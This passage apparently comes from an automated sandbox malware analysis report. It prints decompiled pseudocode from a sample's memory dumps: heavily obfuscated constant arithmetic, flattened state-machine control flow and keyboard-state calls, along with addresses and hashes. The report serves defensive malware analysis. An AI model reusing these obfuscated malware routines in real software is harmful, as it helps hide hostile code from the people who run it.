				_v32 = 0xee641f;
				_v32 = _v32 ^ 0x54466854;
				_v32 = _v32 ^ 0x51df3278;
				_v32 = _v32 ^ 0x057124b2;
				_v36 = 0x2245a1;
				_t163 = __ecx;
				_t141 = 0x59;
				_v36 = _v36 / _t141;
				_t142 = 0x7c;
				_v36 = _v36 / _t142;
				_v36 = _v36 ^ 0x00022b59;
				_v52 = 0x17e728;
				_v52 = _v52 << 7;
				_v52 = _v52 ^ 0x0bfefc33;
				_v24 = 0x5a7c12;
				_v24 = _v24 + 0xffff6a30;
				_v24 = _v24 + 0xb9bd;
				_v24 = _v24 ^ 0x00522d4c;
				_v8 = 0x70b293;
				_v8 = _v8 ^ 0xb7f64013;
				_v8 = _v8 | 0x98950303;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0xf38d6f21;
				_v28 = 0x5e48e6;
				_v28 = _v28 >> 2;
				_v28 = _v28 << 0xf;
				_v28 = _v28 ^ 0xc917f664;
				_v44 = 0xd34be4;
				_v44 = _v44 ^ 0x1af04c78;
				_v44 = _v44 ^ 0x1a25cf5b;
				_v56 = 0x13a2c8;
				_v56 = _v56 ^ 0x00107e6c;
				_v20 = 0x6acc1;
				_t143 = 0x48;
				_v20 = _v20 * 0x75;
				_v20 = _v20 | 0x5ce04716;
				_v20 = _v20 ^ 0xfe39b07b;
				_v20 = _v20 ^ 0xa1d6ae77;
				_v48 = 0x9d30cb;
				_t144 =  &_v320;
				_v48 = _v48 / _t143;
				_v48 = _v48 ^ 0x00028c5d;
				_v12 = 0x456efe;
				_v12 = _v12 + 0xffff4082;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0xdbb5e427;
				_v12 = _v12 ^ 0xdb99f5c8;
				while(1) {
					_t133 =  *_t163;
					if(_t133 == 0) {
						break;
					}
					if(_t133 == 0x2e) {
						 *_t144 = 0;
					} else {
						 *_t144 = _t133;
						_t144 = _t144 + 1;
						_t163 = _t163 + 1;
						continue;
					}
					L6:
					_t164 = E002CADE6(_v40, _v16,  &_v320, _v60);
					if(_t164 != 0) {
						L8:
						_t136 = E002DDBEA(_t163 + 1, _v8, _v28, _v44);
						_push(_v12);
						_push(_t136 ^ 0x2ac2611c);
						_push(_v48);
						_push(_t164);
						return E002CCDCD(_v56, _v20);
					}
					_t139 = E002DCADF(_v32,  &_v320, _v36, _v52);
					_t164 = _t139;
					if(_t164 != 0) {
						goto L8;
					}
					return _t139;
				}
				goto L6;
			}



























                                                                                                                                    0x002dbe30
                                                                                                                                    0x002dbe39
                                                                                                                                    0x002dbe3d
                                                                                                                                    0x002dbe44
                                                                                                                                    0x002dbe4b
                                                                                                                                    0x002dbe52
                                                                                                                                    0x002dbe59
                                                                                                                                    0x002dbe60
                                                                                                                                    0x002dbe67
                                                                                                                                    0x002dbe6e
                                                                                                                                    0x002dbe72
                                                                                                                                    0x002dbe79
                                                                                                                                    0x002dbe80
                                                                                                                                    0x002dbe87
                                                                                                                                    0x002dbe8e
                                                                                                                                    0x002dbe95
                                                                                                                                    0x002dbea3
                                                                                                                                    0x002dbea5
                                                                                                                                    0x002dbeaa
                                                                                                                                    0x002dbeb2
                                                                                                                                    0x002dbeb7
                                                                                                                                    0x002dbebc
                                                                                                                                    0x002dbec3
                                                                                                                                    0x002dbeca
                                                                                                                                    0x002dbece
                                                                                                                                    0x002dbed5
                                                                                                                                    0x002dbedc
                                                                                                                                    0x002dbee3
                                                                                                                                    0x002dbeea
                                                                                                                                    0x002dbef1
                                                                                                                                    0x002dbef8
                                                                                                                                    0x002dbeff
                                                                                                                                    0x002dbf06
                                                                                                                                    0x002dbf0a
                                                                                                                                    0x002dbf11
                                                                                                                                    0x002dbf18
                                                                                                                                    0x002dbf1c
                                                                                                                                    0x002dbf20
                                                                                                                                    0x002dbf27
                                                                                                                                    0x002dbf2e
                                                                                                                                    0x002dbf35
                                                                                                                                    0x002dbf3c
                                                                                                                                    0x002dbf49
                                                                                                                                    0x002dbf50
                                                                                                                                    0x002dbf5b
                                                                                                                                    0x002dbf5c
                                                                                                                                    0x002dbf5f
                                                                                                                                    0x002dbf66
                                                                                                                                    0x002dbf6d
                                                                                                                                    0x002dbf74
                                                                                                                                    0x002dbf80
                                                                                                                                    0x002dbf86
                                                                                                                                    0x002dbf89
                                                                                                                                    0x002dbf90
                                                                                                                                    0x002dbf97
                                                                                                                                    0x002dbf9e
                                                                                                                                    0x002dbfa1
                                                                                                                                    0x002dbfa8
                                                                                                                                    0x002dbfb9
                                                                                                                                    0x002dbfb9
                                                                                                                                    0x002dbfbd
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002dbfb3
                                                                                                                                    0x002dbfc1
                                                                                                                                    0x002dbfb5
                                                                                                                                    0x002dbfb5
                                                                                                                                    0x002dbfb7
                                                                                                                                    0x002dbfb8
                                                                                                                                    0x00000000
                                                                                                                                    0x002dbfb8
                                                                                                                                    0x002dbfc4
                                                                                                                                    0x002dbfd9
                                                                                                                                    0x002dbfdf
                                                                                                                                    0x002dbffd
                                                                                                                                    0x002dc00c
                                                                                                                                    0x002dc011
                                                                                                                                    0x002dc019
                                                                                                                                    0x002dc01a
                                                                                                                                    0x002dc023
                                                                                                                                    0x00000000
                                                                                                                                    0x002dc029
                                                                                                                                    0x002dbff0
                                                                                                                                    0x002dbff5
                                                                                                                                    0x002dbffb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002dc031
                                                                                                                                    0x002dc031
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Gb$L-R$ThFT$iR6$H^
                                                                                                                                    • API String ID: 0-1567385930
                                                                                                                                    • Opcode ID: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                                    • Instruction ID: 19f11f9432f4d6ac1cf57e3e6ceae0ab8521adf61fdb50e55e73cf105c12f722
                                                                                                                                    • Opcode Fuzzy Hash: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                                    • Instruction Fuzzy Hash: 06513371C05219EBDF15CFA4D94A8EEFBB1FF04314F20815AE41276260C7B51A55CF94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1001B43F Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                                    • GetKeyState.USER32(00000010), ref: 1001B463
                                                                                                                                    • GetKeyState.USER32(00000011), ref: 1001B46C
                                                                                                                                    • GetKeyState.USER32(00000012), ref: 1001B475
                                                                                                                                    • SendMessageA.USER32 ref: 1001B48B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: State$LongMessageSendWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1063413437-0
                                                                                                                                    • Opcode ID: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                                    • Instruction ID: b089c7fc05c7e6fbdd4fc06f52c570ea12a8721339fdd196cb0bdf3cbec2e35a
                                                                                                                                    • Opcode Fuzzy Hash: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                                    • Instruction Fuzzy Hash: F6F0E97679075A27EB20BA744CC1F9A0154DF89BD9F028534B741EE0D3DBB0C8819170
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D20BA Relevance: 5.2, Strings: 4, Instructions: 240COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                    			E002D20BA() {
				char _v520;
				signed int _v524;
				unsigned int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _t227;
				intOrPtr _t228;
				signed int _t230;
				void* _t231;
				intOrPtr _t235;
				intOrPtr _t245;
				void* _t247;
				intOrPtr _t254;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t277;
				signed int* _t279;
				void* _t283;

				_t279 =  &_v624;
				_v612 = 0x15bebb;
				_v612 = _v612 ^ 0x0c09d82a;
				_t247 = 0x7e01d7;
				_v612 = _v612 + 0xffff69e9;
				_v612 = _v612 ^ 0xcffb1e8d;
				_v612 = _v612 ^ 0xc3e0ceeb;
				_v596 = 0xb5bc7f;
				_v596 = _v596 << 0xa;
				_v596 = _v596 + 0xbaa7;
				_v596 = _v596 ^ 0xd6f2b68e;
				_v600 = 0x5909af;
				_v600 = _v600 ^ 0x0096463d;
				_v600 = _v600 >> 3;
				_v600 = _v600 ^ 0x0016e9cd;
				_v548 = 0x801d18;
				_v548 = _v548 + 0xffffc800;
				_v548 = _v548 ^ 0x0070ca5a;
				_v580 = 0x2361dd;
				_v580 = _v580 * 0x6f;
				_t277 = 0;
				_v580 = _v580 << 0xe;
				_v580 = _v580 ^ 0xdbb34e1e;
				_v528 = 0x864281;
				_v528 = _v528 >> 0xc;
				_v528 = _v528 ^ 0x0000b217;
				_v560 = 0x478502;
				_v560 = _v560 | 0x3d47d1eb;
				_v560 = _v560 ^ 0x3d4c1a49;
				_v540 = 0x8f961f;
				_v540 = _v540 >> 0xc;
				_v540 = _v540 ^ 0x000d133d;
				_v572 = 0xef4b2;
				_v572 = _v572 << 0xd;
				_v572 = _v572 + 0xffff85b1;
				_v572 = _v572 ^ 0xde949f86;
				_v608 = 0x8e969a;
				_v608 = _v608 << 0xd;
				_t272 = 0x21;
				_v608 = _v608 / _t272;
				_t273 = 0x2f;
				_v608 = _v608 / _t273;
				_v608 = _v608 ^ 0x002a10b8;
				_v620 = 0x864bbd;
				_v620 = _v620 << 0x10;
				_v620 = _v620 + 0x87ba;
				_v620 = _v620 + 0x936f;
				_v620 = _v620 ^ 0x4bb78bcc;
				_v564 = 0xfb8a17;
				_t274 = 0x62;
				_v564 = _v564 * 0x63;
				_v564 = _v564 ^ 0x61429d97;
				_v576 = 0x222f;
				_v576 = _v576 >> 4;
				_v576 = _v576 ^ 0xf39884cf;
				_v576 = _v576 ^ 0xf39d4647;
				_v556 = 0x6068cb;
				_v556 = _v556 ^ 0xfe1a734d;
				_v556 = _v556 ^ 0xfe79d9b4;
				_v616 = 0xc46e23;
				_v616 = _v616 >> 2;
				_v616 = _v616 / _t274;
				_v616 = _v616 * 0x76;
				_v616 = _v616 ^ 0x003e2a5a;
				_v624 = 0x4617e4;
				_v624 = _v624 + 0xffff4d74;
				_v624 = _v624 ^ 0x9dcdfd87;
				_v624 = _v624 + 0x3fd8;
				_v624 = _v624 ^ 0x9d89a5c2;
				_v588 = 0x3a0167;
				_v588 = _v588 << 1;
				_v588 = _v588 + 0xffff1a51;
				_v588 = _v588 ^ 0x00728a40;
				_v532 = 0x3a363e;
				_v532 = _v532 ^ 0xe52a74a2;
				_v532 = _v532 ^ 0xe514694b;
				_v544 = 0x52d5cb;
				_v544 = _v544 | 0x185d0a08;
				_v544 = _v544 ^ 0x18524fe5;
				_v584 = 0x37b3aa;
				_v584 = _v584 + 0xebef;
				_t275 = 0x72;
				_v584 = _v584 * 0x28;
				_v584 = _v584 ^ 0x08d0b087;
				_v592 = 0xa4bebe;
				_v592 = _v592 >> 8;
				_v592 = _v592 | 0x739fbd45;
				_v592 = _v592 ^ 0x739593e3;
				_v552 = 0x17b1c;
				_v552 = _v552 << 0xe;
				_v552 = _v552 ^ 0x5ecd7403;
				_v568 = 0x403d75;
				_v568 = _v568 >> 3;
				_v568 = _v568 | 0x80b15bc0;
				_v568 = _v568 ^ 0x80b9a416;
				_v536 = 0x2ed64e;
				_t276 = _v524;
				_v536 = _v536 / _t275;
				_v536 = _v536 ^ 0x00033d67;
				_v604 = 0x8b403d;
				_v604 = _v604 + 0xffff3866;
				_v604 = _v604 << 8;
				_v604 = _v604 ^ 0x8a7a6cd3;
				goto L1;
				do {
					while(1) {
						L1:
						_t283 = _t247 - 0x73dad95;
						if(_t283 > 0) {
							break;
						}
						if(_t283 == 0) {
							E002DDA22(_v544, _v584, __eflags, _v592,  &_v520, _t247, _v552);
							_t235 = E002C2051(_v536,  &_v520, _v604);
							_t254 =  *0x2e3e10; // 0x0
							 *((intOrPtr*)(_t254 + 0x10)) = _t235;
						} else {
							if(_t247 == 0x7e01d7) {
								_push(_t247);
								_push(_t247);
								 *0x2e3e10 = E002C7FF2(0x45c);
								_t247 = 0x8643fcd;
								continue;
							} else {
								if(_t247 == 0xd34913) {
									_t247 = 0x148c4fa;
									_v524 = _v596;
									continue;
								} else {
									if(_t247 == 0xfeb697) {
										_v524 = _v612;
										goto L8;
									} else {
										if(_t247 != 0x148c4fa) {
											goto L20;
										} else {
											E002D8F9E(_v620, _v564, _v576, _v556, _t276);
											_t279 =  &(_t279[3]);
											L8:
											_t247 = 0xac90332;
											continue;
										}
									}
								}
							}
						}
						L23:
						return _t277;
					}
					__eflags = _t247 - 0x8643fcd;
					if(_t247 == 0x8643fcd) {
						_t227 = E002C912C(_v600, _v560, _t247, _v540, _t247, _v572, _v608);
						_t276 = _t227;
						_t279 =  &(_t279[5]);
						__eflags = _t227;
						if(__eflags == 0) {
							_t247 = 0xfeb697;
							goto L20;
						} else {
							_t245 =  *0x2e3e10; // 0x0
							 *((intOrPtr*)(_t245 + 0x450)) = 1;
							_t247 = 0xd34913;
							goto L1;
						}
					} else {
						__eflags = _t247 - 0xac90332;
						if(_t247 == 0xac90332) {
							_push(_v532);
							_push(_v524);
							_push(_v588);
							_t228 =  *0x2e3e10; // 0x0
							_push(_t228 + 0x23c);
							_t230 = E002D46BB(_v616, _v624);
							_t279 = _t279 - 0xc + 0x1c;
							_t247 = 0xe2d9513;
							__eflags = _t230;
							_t231 = 1;
							_t277 =  ==  ? _t231 : _t277;
							goto L1;
						} else {
							__eflags = _t247 - 0xe2d9513;
							if(_t247 != 0xe2d9513) {
								goto L20;
							} else {
								E002CA55F();
								_t247 = 0x73dad95;
								goto L1;
							}
						}
					}
					goto L23;
					L20:
					__eflags = _t247 - 0x13a2d4a;
				} while (__eflags != 0);
				goto L23;
			}













































                                                                                                                                    0x002d20ba
                                                                                                                                    0x002d20c0
                                                                                                                                    0x002d20ca
                                                                                                                                    0x002d20d2
                                                                                                                                    0x002d20d7
                                                                                                                                    0x002d20df
                                                                                                                                    0x002d20e7
                                                                                                                                    0x002d20ef
                                                                                                                                    0x002d20f7
                                                                                                                                    0x002d20fc
                                                                                                                                    0x002d2104
                                                                                                                                    0x002d210c
                                                                                                                                    0x002d2114
                                                                                                                                    0x002d211c
                                                                                                                                    0x002d2121
                                                                                                                                    0x002d2129
                                                                                                                                    0x002d2131
                                                                                                                                    0x002d2139
                                                                                                                                    0x002d2141
                                                                                                                                    0x002d2152
                                                                                                                                    0x002d2156
                                                                                                                                    0x002d2158
                                                                                                                                    0x002d215d
                                                                                                                                    0x002d2165
                                                                                                                                    0x002d216d
                                                                                                                                    0x002d2172
                                                                                                                                    0x002d217a
                                                                                                                                    0x002d2182
                                                                                                                                    0x002d218a
                                                                                                                                    0x002d2192
                                                                                                                                    0x002d219a
                                                                                                                                    0x002d219f
                                                                                                                                    0x002d21a7
                                                                                                                                    0x002d21af
                                                                                                                                    0x002d21b4
                                                                                                                                    0x002d21bc
                                                                                                                                    0x002d21c4
                                                                                                                                    0x002d21cc
                                                                                                                                    0x002d21d7
                                                                                                                                    0x002d21dc
                                                                                                                                    0x002d21e6
                                                                                                                                    0x002d21eb
                                                                                                                                    0x002d21f1
                                                                                                                                    0x002d21f9
                                                                                                                                    0x002d2201
                                                                                                                                    0x002d2206
                                                                                                                                    0x002d220e
                                                                                                                                    0x002d2216
                                                                                                                                    0x002d221e
                                                                                                                                    0x002d222b
                                                                                                                                    0x002d222c
                                                                                                                                    0x002d2230
                                                                                                                                    0x002d2238
                                                                                                                                    0x002d2240
                                                                                                                                    0x002d2245
                                                                                                                                    0x002d224d
                                                                                                                                    0x002d2255
                                                                                                                                    0x002d225d
                                                                                                                                    0x002d2265
                                                                                                                                    0x002d226d
                                                                                                                                    0x002d2275
                                                                                                                                    0x002d2280
                                                                                                                                    0x002d2289
                                                                                                                                    0x002d228d
                                                                                                                                    0x002d2297
                                                                                                                                    0x002d22a4
                                                                                                                                    0x002d22b1
                                                                                                                                    0x002d22b9
                                                                                                                                    0x002d22c1
                                                                                                                                    0x002d22c9
                                                                                                                                    0x002d22d1
                                                                                                                                    0x002d22d5
                                                                                                                                    0x002d22dd
                                                                                                                                    0x002d22e5
                                                                                                                                    0x002d22ed
                                                                                                                                    0x002d22f5
                                                                                                                                    0x002d22fd
                                                                                                                                    0x002d2305
                                                                                                                                    0x002d230d
                                                                                                                                    0x002d2315
                                                                                                                                    0x002d231d
                                                                                                                                    0x002d232c
                                                                                                                                    0x002d232d
                                                                                                                                    0x002d2331
                                                                                                                                    0x002d2339
                                                                                                                                    0x002d2341
                                                                                                                                    0x002d2346
                                                                                                                                    0x002d234e
                                                                                                                                    0x002d2356
                                                                                                                                    0x002d235e
                                                                                                                                    0x002d2363
                                                                                                                                    0x002d236b
                                                                                                                                    0x002d2373
                                                                                                                                    0x002d2378
                                                                                                                                    0x002d2380
                                                                                                                                    0x002d2388
                                                                                                                                    0x002d2396
                                                                                                                                    0x002d239a
                                                                                                                                    0x002d239e
                                                                                                                                    0x002d23a6
                                                                                                                                    0x002d23ae
                                                                                                                                    0x002d23b6
                                                                                                                                    0x002d23bb
                                                                                                                                    0x002d23bb
                                                                                                                                    0x002d23c3
                                                                                                                                    0x002d23c3
                                                                                                                                    0x002d23c3
                                                                                                                                    0x002d23c3
                                                                                                                                    0x002d23c5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d23cb
                                                                                                                                    0x002d2519
                                                                                                                                    0x002d2532
                                                                                                                                    0x002d2537
                                                                                                                                    0x002d2540
                                                                                                                                    0x002d23d1
                                                                                                                                    0x002d23d7
                                                                                                                                    0x002d243c
                                                                                                                                    0x002d243d
                                                                                                                                    0x002d2445
                                                                                                                                    0x002d244a
                                                                                                                                    0x00000000
                                                                                                                                    0x002d23d9
                                                                                                                                    0x002d23df
                                                                                                                                    0x002d2420
                                                                                                                                    0x002d2425
                                                                                                                                    0x00000000
                                                                                                                                    0x002d23e1
                                                                                                                                    0x002d23e7
                                                                                                                                    0x002d2416
                                                                                                                                    0x00000000
                                                                                                                                    0x002d23e9
                                                                                                                                    0x002d23ef
                                                                                                                                    0x00000000
                                                                                                                                    0x002d23f5
                                                                                                                                    0x002d2406
                                                                                                                                    0x002d240b
                                                                                                                                    0x002d240e
                                                                                                                                    0x002d240e
                                                                                                                                    0x00000000
                                                                                                                                    0x002d240e
                                                                                                                                    0x002d23ef
                                                                                                                                    0x002d23e7
                                                                                                                                    0x002d23df
                                                                                                                                    0x002d23d7
                                                                                                                                    0x002d2544
                                                                                                                                    0x002d254f
                                                                                                                                    0x002d254f
                                                                                                                                    0x002d2454
                                                                                                                                    0x002d245a
                                                                                                                                    0x002d24ca
                                                                                                                                    0x002d24cf
                                                                                                                                    0x002d24d1
                                                                                                                                    0x002d24d4
                                                                                                                                    0x002d24d6
                                                                                                                                    0x002d24f0
                                                                                                                                    0x00000000
                                                                                                                                    0x002d24d8
                                                                                                                                    0x002d24d8
                                                                                                                                    0x002d24e0
                                                                                                                                    0x002d24e6
                                                                                                                                    0x00000000
                                                                                                                                    0x002d24e6
                                                                                                                                    0x002d245c
                                                                                                                                    0x002d245c
                                                                                                                                    0x002d245e
                                                                                                                                    0x002d2478
                                                                                                                                    0x002d247c
                                                                                                                                    0x002d2480
                                                                                                                                    0x002d2484
                                                                                                                                    0x002d2499
                                                                                                                                    0x002d249a
                                                                                                                                    0x002d249f
                                                                                                                                    0x002d24a2
                                                                                                                                    0x002d24a7
                                                                                                                                    0x002d24ab
                                                                                                                                    0x002d24ac
                                                                                                                                    0x00000000
                                                                                                                                    0x002d2460
                                                                                                                                    0x002d2460
                                                                                                                                    0x002d2466
                                                                                                                                    0x00000000
                                                                                                                                    0x002d246c
                                                                                                                                    0x002d246c
                                                                                                                                    0x002d2471
                                                                                                                                    0x00000000
                                                                                                                                    0x002d2471
                                                                                                                                    0x002d2466
                                                                                                                                    0x002d245e
                                                                                                                                    0x00000000
                                                                                                                                    0x002d24f5
                                                                                                                                    0x002d24f5
                                                                                                                                    0x002d24f5
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: /"$>6:$Z*>$u=@
                                                                                                                                    • API String ID: 0-89199335
                                                                                                                                    • Opcode ID: 484c194bc859773dced6db075a23b367170d6d2b60fbe1dd76b67ea8ea70192c
                                                                                                                                    • Instruction ID: 8d4dd6c82521eb620ecacd64a31d6346437c460fd1df2e194438100707dc83ac
                                                                                                                                    • Opcode Fuzzy Hash: 484c194bc859773dced6db075a23b367170d6d2b60fbe1dd76b67ea8ea70192c
                                                                                                                                    • Instruction Fuzzy Hash: 50B10171118381DFC358CF65C48A81BBBE1FBD4748F209A1EF6A286261D3B5C959CF92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C5548 Relevance: 5.2, Strings: 4, Instructions: 233COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002C5548(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v16;
				intOrPtr _v24;
				char _v28;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v64;
				signed int _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				void* __ecx;
				void* _t190;
				void* _t206;
				void* _t208;
				signed int _t209;
				char* _t211;
				signed int _t212;
				intOrPtr _t222;
				intOrPtr* _t225;
				void* _t227;
				char* _t229;
				char _t233;
				intOrPtr _t255;
				intOrPtr* _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int* _t263;

				_t225 = _a16;
				_t257 = _a4;
				_push(_t225);
				_push(_a12);
				_push(_a8);
				_push(_t257);
				_push(__edx);
				E002D20B9(_t190);
				_v56 = 0xb9e7cb;
				_t255 = 0;
				_v52 = 0x6e87b5;
				_t263 =  &(( &_v148)[6]);
				_v48 = 0;
				_v44 = 0;
				_t227 = 0x3ccc1e9;
				_v128 = 0x85629b;
				_t258 = 0x62;
				_v128 = _v128 * 0x5a;
				_v128 = _v128 + 0xfbaf;
				_v128 = _v128 ^ 0x2ee5a62d;
				_v144 = 0xfc0c7f;
				_v144 = _v144 ^ 0xfdfaf442;
				_v144 = _v144 >> 1;
				_v144 = _v144 | 0x14143ad1;
				_v144 = _v144 ^ 0x7e977ecf;
				_v96 = 0xd1f565;
				_v96 = _v96 * 0x21;
				_v96 = _v96 ^ 0x1b12de47;
				_v104 = 0xb219e8;
				_v104 = _v104 | 0x75a31cc8;
				_v104 = _v104 ^ 0x75be6df4;
				_v80 = 0x6fb9b6;
				_v80 = _v80 * 0x3e;
				_v80 = _v80 ^ 0x1b001c4a;
				_v132 = 0x1154a0;
				_v132 = _v132 << 0xb;
				_v132 = _v132 + 0xfffffde8;
				_v132 = _v132 | 0xd1d436bb;
				_v132 = _v132 ^ 0xdbfeae5a;
				_v76 = 0x5374cd;
				_v76 = _v76 << 2;
				_v76 = _v76 ^ 0x0147cb67;
				_v140 = 0x35e68a;
				_v140 = _v140 + 0xffff467d;
				_v140 = _v140 * 0x7c;
				_v140 = _v140 ^ 0x566bba39;
				_v140 = _v140 ^ 0x4faa8078;
				_v124 = 0xf91357;
				_v124 = _v124 << 0xf;
				_v124 = _v124 + 0xf2e4;
				_v124 = _v124 ^ 0x89afe8a4;
				_v112 = 0xf055e4;
				_v112 = _v112 ^ 0x101963ca;
				_v112 = _v112 | 0x7be8ad21;
				_v112 = _v112 ^ 0x7be17431;
				_v84 = 0x17393b;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x05c81c43;
				_v120 = 0xf688ab;
				_v120 = _v120 / _t258;
				_v120 = _v120 * 0x2d;
				_v120 = _v120 ^ 0x00718a36;
				_v116 = 0xa21f51;
				_v116 = _v116 + 0x3c3b;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 ^ 0x0006c391;
				_v88 = 0x51e239;
				_v88 = _v88 + 0x2ec0;
				_v88 = _v88 ^ 0x0058dd2b;
				_v136 = 0xa92d92;
				_v136 = _v136 >> 0xd;
				_v136 = _v136 ^ 0x0647b396;
				_v136 = _v136 ^ 0x20b7ff2f;
				_v136 = _v136 ^ 0x26fd7475;
				_v108 = 0xb50576;
				_t259 = 0x45;
				_v108 = _v108 / _t259;
				_v108 = _v108 ^ 0xb94dc178;
				_v108 = _v108 ^ 0xb943792d;
				_v148 = 0xb9b260;
				_t260 = 0x14;
				_v148 = _v148 / _t260;
				_v148 = _v148 * 0x3f;
				_v148 = _v148 >> 2;
				_v148 = _v148 ^ 0x009e914b;
				_v92 = 0x6e7d65;
				_v92 = _v92 | 0xb573042f;
				_v92 = _v92 ^ 0xb570b7bc;
				_v100 = 0xfd8f7e;
				_v100 = _v100 * 0x5d;
				_v100 = _v100 ^ 0x5c1db3f3;
				L1:
				while(_t227 != 0x3c16ad4) {
					if(_t227 == 0x3ccc1e9) {
						_t227 = 0x7dbf5b4;
						continue;
					}
					if(_t227 == 0x79abc1a) {
						_t229 =  &_v28;
						_t208 = E002CAEFB(_t229, _v124, _v112, _v84,  &_v16, _v120);
						_t263 =  &(_t263[4]);
						if(_t208 != 0) {
							_push(_t229);
							_push(_t229);
							_t222 = E002C7FF2(_v24);
							 *_t257 = _t222;
							if(_t222 != 0) {
								E002CED7E(_v108,  *_t257, _v148, _v28, _v24);
								_t263 =  &(_t263[3]);
								 *((intOrPtr*)(_t257 + 4)) = _v24;
								_t255 = 1;
							}
						}
						_t227 = 0xdaef9d5;
						continue;
					}
					if(_t227 == 0x7dbf5b4) {
						_t209 =  *((intOrPtr*)(_t225 + 4));
						_t233 =  *_t225;
						_v68 = _t209;
						_v72 = _t233;
						_t211 = _t209 - 1 + _t233;
						while(_t211 > _t233) {
							if( *_t211 == 0) {
								break;
							}
							_t211 = _t211 - 1;
						}
						_t212 = _t211 - _t233;
						_v68 = _t212;
						if(_t212 == 0) {
							L16:
							_t227 = 0xfc35b14;
							continue;
						}
						while(_v68 % _v144 != _v128) {
							_t163 =  &_v68;
							 *_t163 = _v68 - 1;
							if( *_t163 != 0) {
								continue;
							}
							goto L16;
						}
						goto L16;
					}
					if(_t227 == 0xdaef9d5) {
						E002D8519(_v92, _v100, _v64);
						L28:
						return _t255;
					}
					if(_t227 != 0xfc35b14) {
						L25:
						if(_t227 != 0xb843ed5) {
							continue;
						}
